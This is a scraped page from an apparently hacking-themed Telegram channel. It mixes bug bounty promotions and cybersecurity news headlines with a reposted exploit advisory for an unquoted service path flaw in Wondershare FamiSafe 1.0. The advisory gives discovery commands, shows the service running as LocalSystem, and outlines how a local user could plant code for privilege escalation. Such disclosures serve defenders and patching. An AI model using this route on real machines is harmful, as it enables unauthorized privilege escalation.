Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.8K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Bug Bounties in Sri Lanka

tl;dr — Bug Zero is a Sri Lanka based Bug Bounty platform and is here to help secure your organization from cybersecurity threats.Continue reading on Bug Zero »
Read more...
Bug Zero is Going to Pay Your Security Bill for 2022

tl;dr — Bug Zero is a Sri Lanka based Bug Bounty platform and is here to help secure your organization from cybersecurity threats.Continue reading on Bug Zero »
Read more...
Dark Reading: Attacks/Breaches
Where AI Falls Down in Cybersecurity

Many cybersecurity products claim to incorporate AI in some way, but in some cases, those claims aren't completely accurate.
Dark Reading: Attacks/Breaches
If the Cloud Is More Secure, Then Why Is Everything Still Broken?

The sooner we discover sources of risk, the better equipped we will be to create effective mitigations for them.
Dark Reading: Attacks/Breaches
Ransomware Adds New Wrinkle in Russian Cybercrime Market

Government crackdowns may destabilize Russian crime rings and strengthen their ties to Chinese allies.
Dark Reading: Attacks/Breaches
Enterprises Look Beyond Antivirus Software for Remote Workers

Priorities are shifting, with growing emphasis on endpoint detection and response (EDR) software and multifactor authentication (MFA), a recent survey of IT professionals shows.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Wondershare FamiSafe 1.0 Unquoted Service Path

https://3.bp.blogspot.com/-m8d6k5PvpEU/WWlvYbY80xI/AAAAAAAAIOk/9YRDlN0af5krj_sxTfYJBUTX80Cs4dJKgCLcBGAs/s1600/h56.png
Wondershare FamiSafe version 1.0 suffers from an unquoted service path vulnerability.

MD5 | d89bbee0fcce3bb599407b9e4a43f051

Download
# Exploit Title: Wondershare FamiSafe 1.0 - 'FSService' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-17
# Vendor Homepage: https://www.wondershare.com/
# Software Link : https://download-es.wondershare.com/famisafe_full7869.exe
# Tested Version: 1.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Step to discover Unquoted Service Path:

C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "FSService" | findstr /i /v """

FSService FSService C:\Program Files (x86)\Wondershare\FamiSafe\FSService.exe Auto
# Service info:

C:\>sc qc FSService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: FSService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\FamiSafe\FSService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : FSService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.


Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video